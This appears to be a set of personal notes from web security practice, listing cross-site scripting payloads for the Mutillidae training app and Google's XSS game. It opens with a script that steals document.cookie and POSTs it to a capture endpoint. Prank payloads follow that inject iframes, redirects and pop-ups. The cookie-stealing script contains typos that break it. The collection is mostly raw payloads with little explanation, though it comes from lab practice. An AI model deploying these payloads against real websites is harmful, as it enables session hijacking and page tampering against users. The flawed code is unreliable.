Use Mutillidae

<script>
    var    lXMLHTTP;
    try {
        var lData = document.cookie;
        var lHost = "localhost";
        var    lAction = "http://" + lHost + "/mutillidae/capture-data.php";
        var lMethod = "POST";
        try {
            lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
        }catch (e) {
            try {
                lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");                
            }catch (e) {
                try {
                    lXMLHTTP = new XMLHTTPRequest();                    
                    }catch (e) {
                        //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
                        }
                }
            }//end try
            lXMLHTTP.onreadystatechange = function(){}
            lXMLHTTP.open(lMethod, lActionm true);
            lXMLHTTP.setRequestHeader("Host", lHost);
            lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            lXMLHTTP.send(lData);
    }catch(e){
        //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
    }
</script>

https://xss-game.appspot.com/

Level 1

<script>alert(1)</script>

Level 2

<img src="bruh.jpg" onerror="alert('XSS')"/>

Level 3

https://xss-game.appspot.com/level3/frame#2'onerror='alert("xss")'>

;alert('XSS');%20/>

%3Balert('XSS');%20/>

;%20onload="alert('XSS');"%20/>

3%26%27onload="alert('XSS');"%20/>

<blockquote class="imgur-embed-pub" lang="en" data-id="Pah7rtn"><a href="//imgur.com/Pah7rtn">MRW I join the vape nation</a></blockquote>

<script async src="//s.imgur.com/min/embed.js" charset="utf-8"></script>

<IFRAME SRC=javascript:alert('XSS')></IFRAME>

<iframe src=//www.youtube.com/embed/dQw4w9WgXcQ></iframe>

It will add an embedded iframe for the youtube video Rick Roll. To keep the link from rendering, I had to HTML endode < to <, and for good measure also change > to > and change the & in < to &.

<img src="http://url.to.file.which/not.exist" onerror=window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ","xss",'height=500,width=500'\);>

<script onload=window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ","xss",'height=500,width=500'\);></script>

<iframe src=//www.youtube.com/embed/dQw4w9WgXcQ></iframe>
<script>window.open("https://www.youtube.com/watch?v=dQw4w9WgXcQ");</script>
<script>function(){function l(u,i){
var d=document;if(!d.getElementById(i)){var s=d.createElement('script');s.src=u;s.id=i;d.body.appendChild(s);}}l('http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js','jquery')}
$('document').ready(function() {
$('#genericPage-content').prepend('<div style="position:relative;height:0;padding-bottom:56.25%"><iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?ecver=2&autoplay=1" width="640" height="360" frameborder="0" style="position:absolute;width:100%;height:100%;left:0" allowfullscreen></iframe></div>');
}
</script>
<script>document.location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";</script>

results matching ""

    No results matching ""